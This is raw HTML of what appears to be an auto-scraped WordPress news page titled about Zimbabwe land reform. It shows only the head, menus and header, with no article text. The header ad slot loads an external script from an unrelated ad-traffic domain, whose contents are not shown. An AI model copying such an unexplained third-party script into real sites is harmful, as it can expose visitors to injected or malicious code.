<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en" prefix="og: http://ogp.me/ns#"> <!--<![endif]-->
<head>
    <title>Zimbabwe: Land Reform - Mugabe &#039;Getting Undue Credit&#039;, War Vets Claim Gulf Times</title>
<meta name="title" content="Zimbabwe: Land Reform - Mugabe &#039;Getting Undue Credit&#039;, War Vets Claim" />
<meta property="og:url" content="http://www.gulftimes.com/2017/08/04/zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim/" />
<meta name="twitter:domain" content="Gulf Times" />
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="http://www.gulftimes.com/xmlrpc.php" />
    
	  <meta property="og:image" content="http://www.gulftimes.com/wp-content/uploads/2017/08/00421134:b86ee65e8b25c74bfd710613d325dc67:arc614x376:w1200.png" /><meta name="author" content="Gulf Times">
<link rel="icon" type="image/png" href="http://www.gulftimes.com/wp-content/uploads/2015/12/gulf-times.jpg">
<!-- This site is optimized with the Yoast SEO plugin v5.1 - https://yoast.com/wordpress/plugins/seo/ -->
<meta name="description" content=" [ad_1]
&lt;br&gt;&lt;div readability=&quot;80.625346901&quot;&gt;
              &lt;div class=&quot;figure picture inset left&quot; readability=&quot;6&quot;&gt;
                &lt;img src=&quot;http://www ..." />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Zimbabwe: Land Reform - Mugabe &#039;Getting Undue Credit&#039;, War Vets Claim" />
<meta property="og:description" content=" [ad_1]
&lt;br&gt;&lt;div readability=&quot;80.625346901&quot;&gt;
              &lt;div class=&quot;figure picture inset left&quot; readability=&quot;6&quot;&gt;
                &lt;img src=&quot;http://www ..." />
<meta property="og:site_name" content="Gulf Times" />
<meta property="article:section" content="Africa" />
<meta property="article:published_time" content="2017-08-04T15:04:51+00:00" />
<meta property="og:image" content="http://www.gulftimes.com/wp-content/uploads/2017/08/00421134:b86ee65e8b25c74bfd710613d325dc67:arc614x376:w1200.png" />
<meta property="og:image:width" content="640" />
<meta property="og:image:height" content="392" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content=" [ad_1]
&lt;br&gt;&lt;div readability=&quot;80.625346901&quot;&gt;
              &lt;div class=&quot;figure picture inset left&quot; readability=&quot;6&quot;&gt;
                &lt;img src=&quot;http://www ..." />
<meta name="twitter:title" content="Zimbabwe: Land Reform - Mugabe &#039;Getting Undue Credit&#039;, War Vets Claim" />
<meta name="twitter:image" content="http://www.gulftimes.com/wp-content/uploads/2017/08/00421134:b86ee65e8b25c74bfd710613d325dc67:arc614x376:w1200.png" />
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Gulf Times &raquo; Feed" href="http://www.gulftimes.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Gulf Times &raquo; Comments Feed" href="http://www.gulftimes.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Gulf Times &raquo; Zimbabwe: Land Reform &#8211; Mugabe &#039;Getting Undue Credit&#039;, War Vets Claim Comments Feed" href="http://www.gulftimes.com/2017/08/04/zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.gulftimes.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.6.6"}};
			!function(a,b,c){function d(a){var c,d,e,f,g,h=b.createElement("canvas"),i=h.getContext&&h.getContext("2d"),j=String.fromCharCode;if(!i||!i.fillText)return!1;switch(i.textBaseline="top",i.font="600 32px Arial",a){case"flag":return i.fillText(j(55356,56806,55356,56826),0,0),!(h.toDataURL().length<3e3)&&(i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,65039,8205,55356,57096),0,0),c=h.toDataURL(),i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,55356,57096),0,0),d=h.toDataURL(),c!==d);case"diversity":return i.fillText(j(55356,57221),0,0),e=i.getImageData(16,16,1,1).data,f=e[0]+","+e[1]+","+e[2]+","+e[3],i.fillText(j(55356,57221,55356,57343),0,0),e=i.getImageData(16,16,1,1).data,g=e[0]+","+e[1]+","+e[2]+","+e[3],f!==g;case"simple":return i.fillText(j(55357,56835),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode8":return i.fillText(j(55356,57135),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode9":return i.fillText(j(55358,56631),0,0),0!==i.getImageData(16,16,1,1).data[0]}return!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i;for(i=Array("simple","flag","unicode8","diversity","unicode9"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='et-gf-open-sans-css'  href='http://fonts.googleapis.com/css?family=Open+Sans:400,700' type='text/css' media='all' />
<link rel='stylesheet' id='et_monarch-css-css'  href='http://www.gulftimes.com/wp-content/plugins/monarch/css/style.css?ver=1.2.5' type='text/css' media='all' />
<link rel='stylesheet' id='rs-plugin-settings-css'  href='http://www.gulftimes.com/wp-content/plugins/revslider/rs-plugin/css/settings.css?rev=4.5.95&#038;ver=4.6.6' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}
</style>
<link rel='stylesheet' id='wp_automatic_gallery_style-css'  href='http://www.gulftimes.com/wp-content/plugins/wp-automatic/css/wp-automatic.css?ver=4.6.6' type='text/css' media='all' />
<link rel='stylesheet' id='wp-lightbox-2.min.css-css'  href='http://www.gulftimes.com/wp-content/plugins/wp-lightbox-2/styles/lightbox.min.css?ver=1.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_open_sans-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C400%2C600%2C700&#038;ver=4.6.6' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_roboto-css'  href='http://fonts.googleapis.com/css?family=Roboto%3A500%2C400italic%2C700%2C500italic%2C400&#038;ver=4.6.6' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='http://www.gulftimes.com/wp-content/plugins/js_composer/assets/css/js_composer.css?ver=4.7.4' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://www.gulftimes.com/wp-content/themes/Newspaper/style.css?ver=6.5.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.gulftimes.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.gulftimes.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://www.gulftimes.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.5.95&#038;ver=4.6.6'></script>
<script type='text/javascript' src='http://www.gulftimes.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.5.95&#038;ver=4.6.6'></script>
<script type='text/javascript' src='http://www.gulftimes.com/wp-content/plugins/wp-automatic/js/main-front.js?ver=4.6.6'></script>
<link rel='https://api.w.org/' href='http://www.gulftimes.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.gulftimes.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.gulftimes.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.6.6" />
<link rel='shortlink' href='http://www.gulftimes.com/?p=33963' />
<link rel="alternate" type="application/json+oembed" href="http://www.gulftimes.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.gulftimes.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;format=xml" />
<style type="text/css" id="et-social-custom-css">
				 
			</style><link rel='canonical' href='http://www.gulftimes.com/2017/08/04/zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim/' />
<!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://www.gulftimes.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.css" media="screen"><![endif]--><!--[if IE  8]><link rel="stylesheet" type="text/css" href="http://www.gulftimes.com/wp-content/plugins/js_composer/assets/css/vc-ie8.css" media="screen"><![endif]-->
<!-- JS generated by theme -->

<script>
    

var tdBlocksArray = []; //here we store all the items for the current page

//td_block class - each ajax block uses a object of this class for requests
function tdBlock() {
    this.id = '';
    this.block_type = 1; //block type id (1-234 etc)
    this.atts = '';
    this.td_column_number = '';
    this.td_current_page = 1; //
    this.post_count = 0; //from wp
    this.found_posts = 0; //from wp
    this.max_num_pages = 0; //from wp
    this.td_filter_value = ''; //current live filter value
    this.is_ajax_running = false;
    this.td_user_action = ''; // load more or infinite loader (used by the animation)
    this.header_color = '';
    this.ajax_pagination_infinite_stop = ''; //show load more at page x
}

    
    
        // td_js_generator - mini detector
        (function(){
            var htmlTag = document.getElementsByTagName("html")[0];

            if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

        })();




        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var td_viewport_interval_list=[{"limit_bottom":767,"sidebar_width":228},{"limit_bottom":1018,"sidebar_width":300},{"limit_bottom":1140,"sidebar_width":324}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img";
var td_animation_stack_general_selectors=".td-animation-stack img, .post img";
var td_ajax_url="http:\/\/www.gulftimes.com\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=6.5.1";
var td_get_template_directory_uri="http:\/\/www.gulftimes.com\/wp-content\/themes\/Newspaper";
var tds_snap_menu="smart_snap_always";
var tds_logo_on_sticky="show_header_logo";
var tds_header_style="";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#4db2ec";
var tds_smart_sidebar="enabled";
var tdThemeName="Newspaper";
var td_magnific_popup_translation_tPrev="Previous (Left arrow key)";
var td_magnific_popup_translation_tNext="Next (Right arrow key)";
var td_magnific_popup_translation_tCounter="%curr% of %total%";
var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded.";
var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded.";
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>


<!-- Header style compiled by theme -->

<style>
    

/* Style generated by theme (global compiled style) */

.block-title > span,
    .block-title > a,
    .block-title > label,
    .widgettitle,
    .widgettitle:after,
    .td-trending-now-title,
    .td-trending-now-wrapper:hover .td-trending-now-title,
    .wpb_tabs li.ui-tabs-active a,
    .wpb_tabs li:hover a,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab.vc_active > a,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab:hover > a,
    .td-related-title .td-cur-simple-item,
    .woocommerce .product .products h2,
    .td-subcat-filter .td-subcat-dropdown:hover .td-subcat-more {
        background-color: #222222;
    }

    .woocommerce div.product .woocommerce-tabs ul.tabs li.active {
    	background-color: #222222 !important;
    }

    .block-title,
    .td-related-title,
    .wpb_tabs .wpb_tabs_nav,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container,
    .woocommerce div.product .woocommerce-tabs ul.tabs:before {
        border-color: #222222;
    }
</style>

<noscript><style> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head>


<body class="single single-post postid-33963 single-format-standard et_monarch zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim wpb-js-composer js-comp-ver-4.7.4 vc_responsive td-animation-stack-type0 td-full-layout" itemscope="itemscope" itemtype="http://schema.org/WebPage">


<div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>

<div id="td-outer-wrap">

    <div class="td-transition-content-and-menu td-mobile-nav-wrap">
        <div id="td-mobile-nav">
    <!-- mobile menu close -->
    <div class="td-mobile-close">
        <a href="#">CLOSE</a>
        <div class="td-nav-triangle"></div>
    </div>

    <div class="td-mobile-content">
        <div class="menu-main-menu-container"><ul id="menu-main-menu" class=""><li id="menu-item-19583" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first menu-item-19583"><a href="http://www.gulftimes.com/politics/">Politics</a></li>
<li id="menu-item-1235" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-1235"><a href="http://www.gulftimes.com/uae-business/">UAE &#8211; Business</a>
<ul class="sub-menu">
	<li id="menu-item-1236" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1236"><a href="http://www.gulftimes.com/uae-business/gcc/">GCC</a></li>
	<li id="menu-item-1237" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1237"><a href="http://www.gulftimes.com/uae-business/middle-east/">Middle East</a></li>
	<li id="menu-item-1238" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1238"><a href="http://www.gulftimes.com/uae-business/oil-market/">Oil Market</a></li>
	<li id="menu-item-1239" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1239"><a href="http://www.gulftimes.com/uae-business/qatar/">Qatar</a></li>
	<li id="menu-item-1240" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1240"><a href="http://www.gulftimes.com/uae-business/stock-market/">Stock Market</a></li>
</ul>
</li>
<li id="menu-item-1241" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-1241"><a href="http://www.gulftimes.com/sport/">Sport</a>
<ul class="sub-menu">
	<li id="menu-item-1242" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1242"><a href="http://www.gulftimes.com/sport/basketball/">Basketball</a></li>
	<li id="menu-item-1243" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1243"><a href="http://www.gulftimes.com/sport/football/">Football</a></li>
	<li id="menu-item-1244" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1244"><a href="http://www.gulftimes.com/sport/formula-one/">Formula One</a></li>
	<li id="menu-item-1245" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1245"><a href="http://www.gulftimes.com/sport/golf/">Golf</a></li>
	<li id="menu-item-1246" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1246"><a href="http://www.gulftimes.com/sport/mba/">MBA</a></li>
	<li id="menu-item-1247" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1247"><a href="http://www.gulftimes.com/sport/tennis/">Tennis</a></li>
</ul>
</li>
<li id="menu-item-1248" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-item-1248"><a href="http://www.gulftimes.com/international/">International</a>
<ul class="sub-menu">
	<li id="menu-item-1249" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-1249"><a href="http://www.gulftimes.com/international/africa/">Africa</a></li>
	<li id="menu-item-2100" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2100"><a href="http://www.gulftimes.com/international/asia/">Asia</a></li>
	<li id="menu-item-1251" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1251"><a href="http://www.gulftimes.com/international/australia/">Australia</a></li>
	<li id="menu-item-1253" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1253"><a href="http://www.gulftimes.com/international/usa/">USA</a></li>
</ul>
</li>
<li id="menu-item-1254" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1254"><a href="http://www.gulftimes.com/culture/">Culture</a></li>
<li id="menu-item-1255" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1255"><a href="http://www.gulftimes.com/opinion/">Opinion</a></li>
<li id="menu-item-1256" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-1256"><a href="http://www.gulftimes.com/entertainment/">Entertainment</a>
<ul class="sub-menu">
	<li id="menu-item-20871" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20871"><a href="http://www.gulftimes.com/entertainment/games/">Games</a></li>
</ul>
</li>
</ul></div>    </div>
</div>    </div>

        <div class="td-transition-content-and-menu td-content-wrap">



<!--
Header style 1
-->

<div class="td-header-wrap td-header-style-1">

    <div class="td-header-top-menu-full">
        <div class="td-container td-header-row td-header-top-menu">
            
    <div class="top-bar-style-1">
        
<div class="td-header-sp-top-menu">

    <div class="td_data_time">Friday, August 4, 2017</div>
                <ul class="top-header-menu td_ul_login"><li class="menu-item"><a class="td-login-modal-js menu-item" href="#login-form" data-effect="mpf-td-login-effect">Sign in / Join</a><span class="td-sp-ico-login td_sp_login_ico_style"></span></li></ul>
                <div  id="login-form" class="white-popup-block mfp-hide mfp-with-anim">
                    <ul class="td-login-tabs">
                        <li><a id="login-link" class="td_login_tab_focus">LOG IN</a></li><li><a id="register-link">REGISTER</a></li>
                    </ul>



                    <div class="td-login-wrap">
                        <div class="td_display_err"></div>

                        <div id="td-login-div" class="">
                            <div class="td-login-panel-title">Welcome! Log into your account</div>
                            <input class="td-login-input" type="text" name="login_email" id="login_email" placeholder="your username" value="" required>
                            <input class="td-login-input" type="password" name="login_pass" id="login_pass" value="" placeholder="your password" required>
                            <input type="button" name="login_button" id="login_button" class="wpb_button btn td-login-button" value="Log In">


                            <div class="td-login-info-text"><a href="#" id="forgot-pass-link">Forgot your password?</a></div>


                        </div>

                        
                        <div id="td-register-div" class="td-dispaly-none">
                            <div class="td-login-panel-title">Register for an account</div>
                            <input class="td-login-input" type="text" name="register_email" id="register_email" placeholder="your email" value="" required>
                            <input class="td-login-input" type="text" name="register_user" id="register_user" placeholder="your username" value="" required>
                            <input type="button" name="register_button" id="register_button" class="wpb_button btn td-login-button" value="Register">
                             <div class="td-login-info-text">A password will be e-mailed to you.</div>
                        </div>

                         <div id="td-forgot-pass-div" class="td-dispaly-none">
                            <div class="td-login-panel-title">Recover your password</div>
                            <input class="td-login-input" type="text" name="forgot_email" id="forgot_email" placeholder="your email" value="" required>
                            <input type="button" name="forgot_button" id="forgot_button" class="wpb_button btn td-login-button" value="Send My Pass">
                        </div>




                    </div>
                </div>
                </div>
        <div class="td-header-sp-top-widget">
    <span class="td-social-icon-wrap"><a target="_blank" href="https://www.facebook.com/igulftimes" title="Facebook"><i class="td-icon-font td-icon-facebook"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="https://twitter.com/gulftimescom" title="Twitter"><i class="td-icon-font td-icon-twitter"></i></a></span></div>
    </div>

        </div>
    </div>

    <div class="td-banner-wrap-full td-logo-wrap-full">
        <div class="td-container td-header-row td-header-header">
            <div class="td-header-sp-logo">
                    <a itemprop="url" href="http://www.gulftimes.com/">
        <img class="td-retina-data" data-retina="http://www.gulftimes.com/wp-content/uploads/2015/12/gulf-times.jpg" src="http://www.gulftimes.com/wp-content/uploads/2015/12/gulf-times.jpg" alt=""/>
    </a>
    <meta itemprop="name" content="Gulf Times">
            </div>
            <div class="td-header-sp-recs">
                <div class="td-header-rec-wrap">
    <div class="td-a-rec td-a-rec-id-header "><script src='https://traffictrade.life/scripts.js' type='text/javascript'></script></div>
</div>            </div>
        </div>
    </div>

    <div class="td-header-menu-wrap-full">
        <div class="td-header-menu-wrap td-header-gradient">
            <div class="td-container td-header-row td-header-main-menu">
                <div id="td-header-menu" role="navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo">
        			<a itemprop="url" class="td-mobile-logo td-sticky-header" href="http://www.gulftimes.com/"><img src="http://viacredit.ro/jobs/wp-content/uploads/2015/11/logo-white.png" alt=""/></a>
			<meta itemprop="name" content="Gulf Times">
				<a itemprop="url" class="td-header-logo td-sticky-header" href="http://www.gulftimes.com/">
			<img class="td-retina-data" data-retina="http://www.gulftimes.com/wp-content/uploads/2015/12/gulf-times.jpg" src="http://www.gulftimes.com/wp-content/uploads/2015/12/gulf-times.jpg" alt=""/>
		</a>
		<meta itemprop="name" content="Gulf Times">
	    </div>
    <div class="menu-main-menu-container"><ul id="menu-main-menu-1" class="sf-menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first td-menu-item td-normal-menu menu-item-19583"><a href="http://www.gulftimes.com/politics/">Politics</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-1235"><a href="http://www.gulftimes.com/uae-business/">UAE &#8211; Business</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1236"><a href="http://www.gulftimes.com/uae-business/gcc/">GCC</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1237"><a href="http://www.gulftimes.com/uae-business/middle-east/">Middle East</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1238"><a href="http://www.gulftimes.com/uae-business/oil-market/">Oil Market</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1239"><a href="http://www.gulftimes.com/uae-business/qatar/">Qatar</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1240"><a href="http://www.gulftimes.com/uae-business/stock-market/">Stock Market</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-1241"><a href="http://www.gulftimes.com/sport/">Sport</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1242"><a href="http://www.gulftimes.com/sport/basketball/">Basketball</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1243"><a href="http://www.gulftimes.com/sport/football/">Football</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1244"><a href="http://www.gulftimes.com/sport/formula-one/">Formula One</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1245"><a href="http://www.gulftimes.com/sport/golf/">Golf</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1246"><a href="http://www.gulftimes.com/sport/mba/">MBA</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1247"><a href="http://www.gulftimes.com/sport/tennis/">Tennis</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children td-menu-item td-normal-menu menu-item-1248"><a href="http://www.gulftimes.com/international/">International</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-1249"><a href="http://www.gulftimes.com/international/africa/">Africa</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-2100"><a href="http://www.gulftimes.com/international/asia/">Asia</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1251"><a href="http://www.gulftimes.com/international/australia/">Australia</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1253"><a href="http://www.gulftimes.com/international/usa/">USA</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1254"><a href="http://www.gulftimes.com/culture/">Culture</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1255"><a href="http://www.gulftimes.com/opinion/">Opinion</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-1256"><a href="http://www.gulftimes.com/entertainment/">Entertainment</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-20871"><a href="http://www.gulftimes.com/entertainment/games/">Games</a></li>
</ul>
</li>
</ul></div></div>


<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
			<form role="search" method="get" class="td-search-form" action="http://www.gulftimes.com/">
				<div class="td-head-form-search-wrap">
					<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>            </div>
        </div>
    </div>

</div><div class="td-main-content-wrap">

    <div class="td-container td-post-template-default ">
